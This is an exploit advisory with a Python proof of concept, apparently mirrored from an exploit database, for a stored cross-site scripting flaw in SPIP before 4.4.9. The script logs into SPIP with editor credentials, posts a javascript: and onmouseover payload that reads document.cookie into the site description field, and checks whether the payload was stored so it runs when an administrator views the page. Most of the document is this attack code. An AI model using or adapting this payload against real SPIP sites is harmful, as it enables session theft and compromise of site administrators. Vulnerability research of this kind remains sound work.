Share
## https://sploitus.com/exploit?id=PACKETSTORM:216072
=============================================================================================================================================
    | # Title     : SPIP before 4.4.9 Stored XSS Injection After Authentication                                                                 |
    | # Author    : indoushka                                                                                                                   |
    | # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 147.0.4 (64 bits)                                                            |
    | # Vendor    : https://www.spip.net/en_rubrique25.html                                                                                     |
    =============================================================================================================================================
    
    [+] Summary    : This Python script uses the requests library to establish an HTTP session and attempt authentication against a website running SPIP using editor-level credentials.
                     After successful login, the script sends a POST request to the site editing endpoint (?exec=site_edit) to inject a JavaScript payload into the descriptif field.
    
    The payload consists of an <a> tag containing:
    
    A javascript: URI in the href attribute
    
    An onmouseover event handler
    
    A call attempting to access document.cookie
    
    The objective is to test for a potential Stored Cross-Site Scripting (Stored XSS) vulnerability if the platform fails to properly sanitize input (e.g., via echappe_anti_xss()).
    
    Workflow:
    
    Create an HTTP session.
    
    Send login credentials.
    
    If authentication succeeds, submit malicious input to a content field.
    
    Check the server response for injected content to determine whether the payload was accepted.
    
    This script represents a security testing scenario intended to verify the presence of a Stored XSS vulnerability in the SPIP administration interface.
    
    [+] POC   : 
    
    import requests
    
    target_url = "http://example-spip-site.com/ecrire/?exec=site_edit"
    login_url = "http://example-spip-site.com/spip.php?page=login"
    username = "redacteur_user"
    password = "password123"
    
    payload = '<a href="javascript:alert(\'XSS_Exploited\')" onmouseover="console.log(document.cookie)">Technical Info</a>'
    
    session = requests.Session()
    login_data = {
        'var_lang': 'en',
        'formulaire_action': 'login',
        'login': username,
        'password': password
    }
    
    print("[+] Attempting to log in...")
    response = session.post(login_url, data=login_data)
    
    if response.status_code == 200:
        print("[+] Login successful. Starting the injection process...")
    
        injection_data = {
            'nom_site': 'Malicious Site',
            'url_site': 'http://attacker.com',
            'descriptif': payload,  
            'statut': 'publie'
        }
        
        submit_response = session.post(target_url, data=injection_data)
        
        if "Technical Info" in submit_response.text:
            print("[!] Injection successful! The code will execute when an admin views the site.")
        else:
            print("[-] Injection failed or was blocked by a security filter.")
    else:
        print("[-] Failed to log in.")
    	
    Greetings to :==============================================================================
    jericho * Larry W. Cashdollar * r00t * Yougharta Ghenai * Malvuln (John Page aka hyp3rlinx)|
    ============================================================================================